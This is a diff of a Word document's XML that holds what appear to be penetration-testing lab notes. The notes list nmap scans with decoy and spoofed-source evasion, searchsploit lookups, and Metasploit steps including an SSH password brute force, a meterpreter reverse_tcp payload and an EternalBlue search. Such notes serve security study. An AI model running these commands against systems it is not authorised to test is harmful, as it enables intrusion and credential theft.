+              <w:t xml:space="preserve"> –version-intensity 9 {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
             <w:r>
               <w:t>-255</w:t>
@@ -1827,12 +2134,21 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>nmap -p</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -p</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1853,7 +2169,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve"> {ipaddress}</w:t>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -1902,8 +2234,29 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap -f {ipaddress} </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -f {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">} </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">– </w:t>
@@ -1955,17 +2308,46 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
+              <w:t>-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -D </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">RND:5 </w:t>
             </w:r>
             <w:r>
-              <w:t>{ipaddress}</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> -sS</w:t>
-            </w:r>
+              <w:t>{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
           <w:p/>
@@ -2007,10 +2389,58 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
-            </w:r>
-            <w:r>
-              <w:t>{ipaddress}, D {ipaddress}, {ipaddress}, {ipaddress}</w:t>
+              <w:t>-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -D </w:t>
+            </w:r>
+            <w:r>
+              <w:t>{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}, D {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}, {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}, {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2057,8 +2487,29 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap -S 8.8.8.8 -Pn -e</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -S 8.8.8.8 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Pn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -e</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> eth0</w:t>
@@ -2129,12 +2580,27 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo </w:t>
-            </w:r>
-            <w:r>
-              <w:t>nmap –script auth 192.168.1.75 -sS</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script auth 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve">   </w:t>
             </w:r>
@@ -2151,14 +2617,35 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script </w:t>
             </w:r>
             <w:r>
               <w:t>malware</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> 192.168.1.75 -sS   </w:t>
+              <w:t xml:space="preserve"> 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2169,8 +2656,29 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script banner 192.168.1.75 -sS   </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script banner 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2179,8 +2687,29 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t xml:space="preserve">Sudo nmap –script exploit 192.168.1.75 -sS   </w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script exploit 192.168.1.75 -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sS</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2205,9 +2734,19 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap</w:t>
-            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> –script-help {name}</w:t>
             </w:r>
@@ -2218,11 +2757,32 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:r>
-              <w:t>Sudo nmap –script</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> ftp-anon.nse 192.168.175</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –script</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> ftp-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>anon.nse</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 192.168.175</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2258,8 +2818,16 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Manual Vulnerability Analysis and searchploit</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Manual Vulnerability Analysis and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>searchploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2281,8 +2849,37 @@
                 <w:numId w:val="5"/>
               </w:numPr>
             </w:pPr>
-            <w:r>
-              <w:t>Sudo nmap -sV {ipaddress}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2294,7 +2891,15 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Find version (vsftpd 2.3.)</w:t>
+              <w:t>Find version (</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>vsftpd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> 2.3.)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2306,7 +2911,15 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Google it if theres already existing exploitation</w:t>
+              <w:t xml:space="preserve">Google it if </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>theres</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> already existing exploitation</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2318,8 +2931,13 @@
             <w:pPr>
               <w:ind w:firstLine="720"/>
             </w:pPr>
-            <w:r>
-              <w:t>Searchsploit {version}</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {version}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2511,12 +3129,21 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Metaploit Framework Structure</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Metaploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Framework Structure</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2547,7 +3174,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Cd /usr/share/Metasploit-framework</w:t>
+              <w:t>Cd /</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>usr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>/share/Metasploit-framework</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2596,6 +3239,7 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2603,6 +3247,7 @@
               </w:rPr>
               <w:t>msfconsole</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – </w:t>
             </w:r>
@@ -2678,7 +3323,15 @@
               <w:t>Use exploit/</w:t>
             </w:r>
             <w:r>
-              <w:t>windows/smb/ms06_040.netapi</w:t>
+              <w:t>windows/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/ms06_040.netapi</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2760,12 +3413,14 @@
             <w:r>
               <w:t xml:space="preserve">CL: show </w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>paypload</w:t>
             </w:r>
             <w:r>
               <w:t>s</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -2856,18 +3511,58 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL: sudo nmap -sV {ipaddress}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: searchsploit {version}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
               <w:t xml:space="preserve">CL: </w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {version}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
             <w:r>
               <w:t>s</w:t>
             </w:r>
@@ -2886,12 +3581,28 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use exploit/unix/-&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: show payploads or show options</w:t>
+              <w:t>CL: use exploit/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>unix</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/-&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: show </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>payploads</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> or show options</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2915,17 +3626,33 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Netcat – allow connection to UDP and TCP</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>CL: nc -help</w:t>
+              <w:t>Netcat</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> – allow connection to UDP and TCP</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nc</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -help</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -2957,8 +3684,33 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>CL: Searchsploit Linux tetnetd</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Linux </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>tetnetd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -2972,8 +3724,17 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>CL: search Linux telnetd</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL: search Linux </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>telnetd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -2987,7 +3748,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>CL: telnet {ipaddress}</w:t>
+              <w:t>CL: telnet {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -3015,17 +3792,41 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: searchsploit samba</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: searchs samba</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/smb/</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>searchs</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3035,12 +3836,33 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use auxiliary/scanner/smb/smb_version</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/smb/{VERSION}</w:t>
+              <w:t>CL: use auxiliary/scanner/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb_version</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/{VERSION}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3106,7 +3928,15 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: searchsploit Samba 3.0.20</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> Samba 3.0.20</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3186,8 +4016,21 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use auxiliary/scanner/ssh/ssh_login</w:t>
-            </w:r>
+              <w:t>CL: use auxiliary/scanner/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ssh</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ssh_login</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -3203,7 +4046,15 @@
               <w:t>PASS_FILE</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> {filepath}</w:t>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>filepath</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3279,7 +4130,23 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: ssh msfadmin@{IPADDRESS}</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ssh</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfadmin</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>@{IPADDRESS}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3304,8 +4171,21 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL: set payload windows/meterpreter/reverse_tcp</w:t>
-            </w:r>
+              <w:t>CL: set payload windows/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>meterpreter</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -3378,8 +4258,13 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL: search eternalblue</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL: search </w:t>
+            </w:r>
